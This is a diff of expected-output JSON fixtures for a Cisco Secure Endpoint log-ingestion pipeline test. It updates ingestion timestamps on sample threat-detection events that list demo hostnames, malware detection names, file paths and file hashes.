"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669405052633000,\"timestamp\":1610705998,\"timestamp_nanoseconds\":847000000,\"date\":\"2021-01-15T10:19:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669405052633129\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -2624,7 +2696,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898175800Z", + "ingested": "2021-12-14T14:40:37.784996213Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":375000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595368\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -2710,7 +2782,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898180800Z", + "ingested": "2021-12-14T14:40:37.784996701Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":360000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -2796,7 +2868,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898186700Z", + "ingested": "2021-12-14T14:40:37.784997193Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669143059628000,\"timestamp\":1610705937,\"timestamp_nanoseconds\":968000000,\"date\":\"2021-01-15T10:18:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669143059628070\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -2876,7 +2948,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898192700Z", + "ingested": "2021-12-14T14:40:37.784997751Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259286289613000,\"timestamp\":1610705905,\"timestamp_nanoseconds\":669000000,\"date\":\"2021-01-15T10:18:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259286289612895\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", @@ -2956,7 +3028,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898198600Z", + "ingested": "2021-12-14T14:40:37.784998262Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259234750005000,\"timestamp\":1610705893,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-15T10:18:13+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259234750005342\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", @@ -3036,7 +3108,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898204500Z", + "ingested": "2021-12-14T14:40:37.784998747Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259183210398000,\"timestamp\":1610705881,\"timestamp_nanoseconds\":645000000,\"date\":\"2021-01-15T10:18:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259183210397789\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", @@ -3135,7 +3207,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898210600Z", + "ingested": "2021-12-14T14:40:37.784999382Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180335966167761000,\"timestamp\":1610705878,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-15T10:17:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6180335966167760897\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Fax.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\Documents\\\\Fax\\\\Fax.exe\",\"identity\":{\"sha256\":\"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc\",\"sha1\":\"f9b02ad8d25157eebdb284631ff646316dc606d5\",\"md5\":\"b2e15a06b0cca8a926c94f8a8eae3d88\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "code": "1090519054", "kind": "alert", @@ -3229,7 +3301,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898216500Z", + "ingested": "2021-12-14T14:40:37.784999884Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -3315,7 +3387,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898222500Z", + "ingested": "2021-12-14T14:40:37.785000386Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":653000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -3401,7 +3473,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898228400Z", + "ingested": "2021-12-14T14:40:37.785000887Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -3481,7 +3553,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898234200Z", + "ingested": "2021-12-14T14:40:37.785001433Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259135965757000,\"timestamp\":1610705870,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259135965757532\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", @@ -3560,7 +3632,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898240100Z", + "ingested": "2021-12-14T14:40:37.785001998Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900291000600,\"timestamp\":1610705861,\"timestamp_nanoseconds\":291000000,\"date\":\"2021-01-15T10:17:41+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610705861,\"start_date\":\"2021-01-15T10:17:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "code": "1107296272", "kind": "alert", @@ -3643,7 +3715,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898246200Z", + "ingested": "2021-12-14T14:40:37.785002504Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":613000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -3727,7 +3799,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898252Z", + "ingested": "2021-12-14T14:40:37.785002982Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":114000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163569\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json index 2faff34a516..88436ca15f6 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json @@ -34,7 +34,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337040100Z", + "ingested": "2021-12-14T14:40:41.774804622Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 